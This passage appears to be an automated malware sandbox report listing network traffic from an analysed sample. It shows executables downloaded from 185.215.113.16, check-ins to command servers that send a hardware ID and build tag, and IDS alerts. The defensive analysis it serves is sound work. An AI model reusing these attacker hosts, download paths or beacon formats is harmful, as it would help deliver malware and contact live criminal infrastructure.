00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 22:09:26 GMTContent-Type: application/octet-streamContent-Length: 971776Last-Modified: Mon, 09 Dec 2024 21:07:21 GMTConnection: keep-aliveETag: "67575c09-ed400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 01 5c 57 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 24 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 3c ff 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 a8 68 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 68 01 00 00 40 0d 00 00 6a 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 5e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 22:09:33 GMTContent-Type: application/octet-streamContent-Length: 2895872Last-Modified: Mon, 09 Dec 2024 21:07:46 GMTConnection: keep-aliveETag: "67575c22-2c3000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2c 00 00 04 00 00 88 b9 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 64 74 76 77 61 6b 66 00 e0 2b 00 00 a0 00 00 00 ce 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 6a 6d 69 68 75 61 76 00 20 00 00 00 80 2c 00 00 06 00 00 00 08 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2c 00 00 22 00 00 00 0e 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 09 Dec 2024 22:09:40 GMTContent-Type: application/octet-streamContent-Length: 2895872Last-Modified: Mon, 09 Dec 2024 21:07:48 GMTConnection: keep-aliveETag: "67575c24-2c3000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 a0 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 2c 00 00 04 00 00 88 b9 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 63 64 74 76 77 61 6b 66 00 e0 2b 00 00 a0 00 00 00 ce 2b 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 6a 6d 69 68 75 61 76 00 20 00 00 00 80 2c 00 00 06 00 00 00 08 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 a0 2c 00 00 22 00 00 00 0e 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 33 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013536001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 33 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013537001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFBGIJKEGIECAAFHDHHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 37 41 33 30 41 32 43 37 41 35 31 39 31 35 33 33 34 32 33 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 42 47 49 4a 4b 45 47 49 45 43 41 41 46 48 44 48 2d 2d 0d 0a Data Ascii: ------HDAFBGIJKEGIECAAFHDHContent-Disposition: form-data; name="hwid"9D7A30A2C7A51915334237------HDAFBGIJKEGIECAAFHDHContent-Disposition: form-data; name="build"stok------HDAFBGIJKEGIECAAFHDH--
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 33 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013538001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 33 35 33 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013539001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJKKJJDAAAAAKFHJJDGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 37 41 33 30 41 32 43 37 41 35 31 39 31 35 33 33 34 32 33 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 2d 2d 0d 0a Data Ascii: ------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="hwid"9D7A30A2C7A51915334237------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="build"stok------IJJKKJJDAAAAAKFHJJDG--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49770 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49790 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49781 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49791 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49800 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49814 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49815 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49827 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49821 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49833 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49834 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49842 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49838 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49806 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49852 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49861 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49864 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49868 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49897 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49906 -> 104.21.48.1:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49880 -> 104.21.48.1:443
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
